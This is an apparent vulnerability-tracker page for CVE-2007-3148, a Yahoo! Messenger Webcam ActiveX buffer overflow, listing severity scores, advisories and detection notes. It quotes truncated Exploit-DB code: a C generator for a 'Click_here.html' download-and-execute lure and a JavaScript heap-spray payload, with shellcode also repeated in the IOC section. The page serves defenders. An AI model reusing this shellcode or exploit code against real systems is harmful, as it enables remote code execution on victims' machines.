CVE-2007-3148
published 2007-06-11CVE-2007-3148: Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary…
PriorityP267critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.34%
95.7th percentile
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC%uCC4A%uD0FF
- →The vulnerable ActiveX control is ywcvwr.dll version 2.0.1.4; detect instantiation of this control in browser contexts or presence of the DLL on disk. ↗
- →Exploit triggers via the 'receive' method of the ActiveX control with an overly long 'server' property value; monitor ActiveX method calls to ywcvwr.dll's receive method with large argument strings. ↗
- ·The exploit targets Yahoo! Messenger version 8.1.0.249 with ywcvwr.dll 2.0.1.4 specifically; other versions may not be vulnerable or may require different offsets. ↗
- ·Exploit 4043 notes a bug fix over a prior version ('Fixed bug in last post'), indicating the shellcode/heap-spray offsets were revised; earlier variants may differ. ↗
- ·The download-and-execute shellcode (exploit 4052) requires a valid HTTP or FTP URL to a remote payload; the URL is embedded at runtime and will vary per attacker infrastructure. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6w5r-99x5-qx74: Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr
ghsa_unreviewed·2022-05-01
CVE-2007-3148 [HIGH] CWE-119 GHSA-6w5r-99x5-qx74: Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
VulnCheck
yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 9.3
CVE-2007-3148 [CRITICAL] yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
Affected: yahoo messenger
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute
exploitdb·2007-06-08
CVE-2007-3148 Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute
Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute
---
/*
Compile in LCC-win32 (Free!)
Download and exec any file you like!
Have Fun!
*/
#include
#include
#include
char *file = "Click_here.html";
FILE *fp = NULL;
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x
Exploit-DB
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)
exploitdb·2007-06-07
CVE-2007-3148 Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)
---
This affects the viewer ywcvwr.dll with yahoo messenger
latest version tested.
Fixed bug in last post
(x=0;xi
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.htmlhttp://messenger.yahoo.com/security_update.php?id=060707http://osvdb.org/37081http://research.eeye.com/html/advisories/published/AD20070608.htmlhttp://research.eeye.com/html/advisories/upcoming/20070605.htmlhttp://secunia.com/advisories/25547http://securitytracker.com/id?1018204http://www.kb.cert.org/vuls/id/932217http://www.securityfocus.com/archive/1/470861/100/0/threadedhttp://www.securityfocus.com/bid/24341http://www.securityfocus.com/bid/24355http://www.securitytracker.com/id?1018203http://www.vupen.com/english/advisories/2007/2094https://exchange.xforce.ibmcloud.com/vulnerabilities/34759https://www.exploit-db.com/exploits/4043http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.htmlhttp://messenger.yahoo.com/security_update.php?id=060707http://osvdb.org/37081http://research.eeye.com/html/advisories/published/AD20070608.htmlhttp://research.eeye.com/html/advisories/upcoming/20070605.htmlhttp://secunia.com/advisories/25547http://securitytracker.com/id?1018204http://www.kb.cert.org/vuls/id/932217http://www.securityfocus.com/archive/1/470861/100/0/threadedhttp://www.securityfocus.com/bid/24341http://www.securityfocus.com/bid/24355http://www.securitytracker.com/id?1018203http://www.vupen.com/english/advisories/2007/2094https://exchange.xforce.ibmcloud.com/vulnerabilities/34759https://www.exploit-db.com/exploits/4043
2007-06-11
Published
Exploited in the wild